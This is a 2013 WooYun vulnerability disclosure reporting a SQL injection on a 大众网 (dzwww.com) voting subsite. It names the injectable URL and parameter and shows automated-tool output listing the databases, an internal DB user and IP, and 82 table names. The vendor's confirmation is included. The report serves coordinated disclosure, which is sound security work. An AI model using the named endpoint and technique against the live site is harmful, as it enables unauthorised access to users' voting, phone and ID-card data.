当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-040147

漏洞标题:大众网#某分站sql注入漏洞一枚

相关厂商:大众网

漏洞作者: 爱上平顶山

提交时间:2013-10-18 09:19

修复时间:2013-12-02 09:19

公开时间:2013-12-02 09:19

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-10-18: 细节已通知厂商并且等待厂商处理中
2013-10-18: 厂商已经确认,细节仅向厂商公开
2013-10-28: 细节向核心白帽子及相关领域专家公开
2013-11-07: 细节向普通白帽子公开
2013-11-17: 细节向实习白帽子公开
2013-12-02: 细节向公众公开

简要描述:

0.0

详细说明:

大众网
点:http://tp.dzwww.com/zhuanti/sdtyn/index.jsp?group=2
其他自测
信息:
web application technology: JSP
back-end DBMS: MySQL 5.0
[09:05:25] [INFO] fetching database names
[09:05:25] [INFO] the SQL query used returns 2 entries
[09:05:25] [INFO] retrieved: information_schema
[09:05:26] [INFO] retrieved: dzvote
available databases [2]:
[*] dzvote
[*] information_schema
web application technology: JSP
back-end DBMS: MySQL 5.0
[09:06:09] [INFO] retrieved: 'dzvote'@'172.19.2.40'
database management system users [1]:
[*] 'dzvote'@'172.19.2.40'
表比较多。

0.png


Database: dzvote
[82 tables]
+---------------------------+
| app_child |
| app_child_user |
| app_handle_info |
| app_hh_msg |
| app_hh_phone |
| app_phone |
| app_random |
| app_temp_user |
| app_tydm |
| app_vote_admin |
| app_vote_admin_user |
| app_vote_analysis |
| app_vote_bip |
| app_vote_bl |
| app_vote_blr |
| app_vote_calling |
| app_vote_cooper |
| app_vote_house_user |
| app_vote_hzfx |
| app_vote_idcard |
| app_vote_idcard11 |
| app_vote_indexpic |
| app_vote_info |
| app_vote_info_delete |
| app_vote_info_jndt |
| app_vote_ip |
| app_vote_ip20120528 |
| app_vote_ip20130909 |
| app_vote_ip_load |
| app_vote_ivr |
| app_vote_ivr_temp |
| app_vote_ivr_temp20120601 |
| app_vote_ivr_temp20121119 |
| app_vote_ivr_temp20130114 |
| app_vote_jnsdqn |
| app_vote_koupiao |
| app_vote_log |
| app_vote_logo |
| app_vote_lottery |
| app_vote_mac |
| app_vote_message |
| app_vote_mlcz |
| app_vote_name |
| app_vote_news |
| app_vote_obj |
| app_vote_orders |
| app_vote_other_temp |
| app_vote_partner |
| app_vote_phone |
| app_vote_seidcard |
| app_vote_sign |
| app_vote_skin |
| app_vote_sms |
| app_vote_sms_limit |
| app_vote_sms_temp |
| app_vote_sms_temp20111109 |
| app_vote_sms_temp20120601 |
| app_vote_sms_temp20121119 |
| app_vote_sms_temp20130114 |
| app_vote_subject |
| app_vote_subject_news |
| app_vote_template |
| app_vote_tuopiao |
| app_vote_tuopiao_old |
| app_vote_use_temp |
| app_vote_user |
| app_vote_user_test |
| app_vote_wall |
| app_vote_web |
| app_vote_web_limit |
| app_vote_web_temp |
| app_vote_web_temp20120813 |
| app_vote_web_temp20120820 |
| app_vote_web_temp20121012 |
| app_vote_web_temp20130828 |
| app_vote_web_temp20130909 |
| app_vote_web_temp20130928 |
| app_vote_web_temp_load |
| app_vote_webconfig |
| tChkDBCon |
| tchkdbcon |
| zcr_phone |
+---------------------------+
ok

漏洞证明:

Database: dzvote
[82 tables]
+---------------------------+
| app_child |
| app_child_user |
| app_handle_info |
| app_hh_msg |
| app_hh_phone |
| app_phone |
| app_random |
| app_temp_user |
| app_tydm |
| app_vote_admin |
| app_vote_admin_user |
| app_vote_analysis |
| app_vote_bip |
| app_vote_bl |
| app_vote_blr |
| app_vote_calling |
| app_vote_cooper |
| app_vote_house_user |
| app_vote_hzfx |
| app_vote_idcard |
| app_vote_idcard11 |
| app_vote_indexpic |
| app_vote_info |
| app_vote_info_delete |
| app_vote_info_jndt |
| app_vote_ip |
| app_vote_ip20120528 |
| app_vote_ip20130909 |
| app_vote_ip_load |
| app_vote_ivr |
| app_vote_ivr_temp |
| app_vote_ivr_temp20120601 |
| app_vote_ivr_temp20121119 |
| app_vote_ivr_temp20130114 |
| app_vote_jnsdqn |
| app_vote_koupiao |
| app_vote_log |
| app_vote_logo |
| app_vote_lottery |
| app_vote_mac |
| app_vote_message |
| app_vote_mlcz |
| app_vote_name |
| app_vote_news |
| app_vote_obj |
| app_vote_orders |
| app_vote_other_temp |
| app_vote_partner |
| app_vote_phone |
| app_vote_seidcard |
| app_vote_sign |
| app_vote_skin |
| app_vote_sms |
| app_vote_sms_limit |
| app_vote_sms_temp |
| app_vote_sms_temp20111109 |
| app_vote_sms_temp20120601 |
| app_vote_sms_temp20121119 |
| app_vote_sms_temp20130114 |
| app_vote_subject |
| app_vote_subject_news |
| app_vote_template |
| app_vote_tuopiao |
| app_vote_tuopiao_old |
| app_vote_use_temp |
| app_vote_user |
| app_vote_user_test |
| app_vote_wall |
| app_vote_web |
| app_vote_web_limit |
| app_vote_web_temp |
| app_vote_web_temp20120813 |
| app_vote_web_temp20120820 |
| app_vote_web_temp20121012 |
| app_vote_web_temp20130828 |
| app_vote_web_temp20130909 |
| app_vote_web_temp20130928 |
| app_vote_web_temp_load |
| app_vote_webconfig |
| tChkDBCon |
| tchkdbcon |
| zcr_phone |
+---------------------------+

修复方案:

过滤。

版权声明:转载请注明来源 爱上平顶山@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-10-18 10:48

厂商回复:

已确认问题存在,感谢 山山提供信息。 努力各种姿势修复中。

最新状态:

暂无